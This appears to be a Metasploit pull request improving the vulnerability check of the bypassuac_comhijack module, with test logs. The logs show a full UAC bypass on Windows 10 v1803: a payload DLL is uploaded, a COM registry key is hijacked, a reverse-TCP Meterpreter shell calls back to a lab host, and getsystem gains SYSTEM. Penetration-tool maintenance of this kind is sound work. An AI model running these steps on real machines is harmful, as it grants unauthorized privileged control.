Update check comhijack #16268
LGTM. I tested that it still works on Windows 10 v1803, but properly identifies that v21H2 is not vulnerable. Thanks for the patch @bwatters-r7 !
Testing Output
Windows 10 x64 v1803
msf6 exploit(windows/local/bypassuac_comhijack) > show targets
Exploit targets:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/local/bypassuac_comhijack) >
msf6 exploit(windows/local/bypassuac_comhijack) > show options
Module options (exploit/windows/local/bypassuac_comhijack):
Name Current Setting Required Description
---- --------------- -------- -----------
SESSION -1 yes The session to run this module on
Payload options (windows/meterpreter/reverse_tcp):
Name Current Setting Required Description
---- --------------- -------- -----------
EXITFUNC process yes Exit technique (Accepted: '', seh, thread, process, none)
LHOST 192.168.159.128 yes The listen address (an interface may be specified)
LPORT 4444 yes The listen port
Exploit target:
Id Name
-- ----
0 Automatic
msf6 exploit(windows/local/bypassuac_comhijack) > set PAYLOAD windows/x64/meterpreter/reverse_tcp
PAYLOAD => windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > exploit
[-] Handler failed to bind to 192.168.159.128:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[+] The target appears to be vulnerable.
[*] UAC is Enabled, checking level...
[+] Part of Administrators group! Continuing...
[+] UAC is set to Default
[+] BypassUAC can bypass this setting, continuing...
[*] Targeting Computer Managment via HKCU\Software\Classes\CLSID\{0A29FF9E-7F9C-4437-8B11-F424491E3931} ...
[*] Uploading payload to C:\Users\SMCINT~1\AppData\Local\Temp\GKelnqRg.dll ...
[*] Executing high integrity process C:\Windows\System32\mmc.exe
[*] Sending stage (200262 bytes) to 192.168.159.91
[*] Meterpreter session 2 opened (192.168.159.128:4444 -> 192.168.159.91:51936 ) at 2022-03-04 09:47:51 -0500
[*] Cleaning up registry; this can take some time...
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > jobs
Jobs
====
Id Name Payload Payload opts
-- ---- ------- ------------
0 Exploit: multi/handler windows/x64/meterpreter/reverse_tcp tcp://192.168.159.128:4444
msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > check VERBOSE=true
[*] System OS Detected: Windows 10 (10.0 Build 17134).
[*] Detected build number: 17134
[*] The target appears to be vulnerable.
msf6 exploit(windows/local/bypassuac_comhijack) > sessions -i -1
[*] Starting interaction with 2...
meterpreter > getuid
Server username: DESKTOP-2OL4COJ\smcintyre
meterpreter > sysinfo
Computer : DESKTOP-2OL4COJ
OS : Windows 10 (10.0 Build 17134).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > getsystem
...got system via technique 1 (Named Pipe Impersonation (In Memory/Admin)).
meterpreter >
Windows 10 x64 v21H2
msf6 payload(windows/x64/meterpreter/reverse_tcp) > sessions -i -1
[*] Starting interaction with 3...
meterpreter > getuid
Server username: DESKTOP-SRAQBLH\smcintyre
meterpreter > sysinfo
Computer : DESKTOP-SRAQBLH
OS : Windows 10 (10.0 Build 19044).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 2
Meterpreter : x64/windows
meterpreter > background
[*] Backgrounding session 3...
msf6 payload(windows/x64/meterpreter/reverse_tcp) > previous
[*] Using configured payload windows/x64/meterpreter/reverse_tcp
msf6 exploit(windows/local/bypassuac_comhijack) > run
[-] Handler failed to bind to 192.168.159.128:4444:- -
[-] Handler failed to bind to 0.0.0.0:4444:- -
[*] Running automatic check ("set AutoCheck false" to disable)
[-] Exploit aborted due to failure: not-vulnerable: The target is not exploitable. "set ForceExploit true" to override check result.
[*] Exploit completed, but no session was created.
msf6 exploit(windows/local/bypassuac_comhijack) > check
[*] The target is not exploitable.
msf6 exploit(windows/local/bypassuac_comhijack) >
Release Notes
This updates the check method of the
Fixes #16216
This improves the check method for exploit/windows/local/bypassuac_comhijack by verifying build numbers for Windows 10 and 2016+ Server editions. It also adds the AutoCheck changes and includes a RuboCop cleanup.
Testing
use exploit/windows/local/bypassuac_comhijack
set session <session>
Windows 7
Windows 10 v1809
Windows Server 2019
Windows 10 x64 1909